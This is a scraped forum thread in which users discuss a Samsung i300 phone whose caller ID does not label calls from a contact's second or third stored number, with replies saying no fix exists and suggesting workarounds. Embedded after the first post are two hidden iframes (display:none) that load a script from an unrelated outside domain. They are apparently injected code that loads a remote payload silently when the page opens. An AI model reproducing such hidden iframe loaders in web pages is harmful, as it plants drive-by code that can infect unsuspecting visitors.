+ Reply to Thread

Caller Id problem

I was wondering if any one has come up with a solution for the address book not identifying multiple phone numbers for the same person. My work has 3 different numbers, and if i get a call from the 2nd or 3rd listing in my address book, my caller id doesn't display it as "work". This is annoying especially when soo many people have home numbers and cell #'s. Maybe there is a different address book that someone could reccommend?

Thanks <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

i300 User
    No fix I know of yet. Hopefully this and the other funky quirks will be addressed in the first service pack that Samsung will (hopefully) be releasing soon.

There is no other address book program that will work with this phone and allow you to dial from the phone book - Samsung has to release their SDK for this phone (hopefully soon?) in order for other address progs to access the dialing feautures of Samsung's proprietary phone interface.

gf

A sensible temporary fix would be to pull out that thesaurus my friend. Words like office, business, or even workk should suffice, no?

phone book

well, guess I gotta do what I gotta do.. and that seems to be listing my work numbers in the address book several times. bummer

thanks for the input though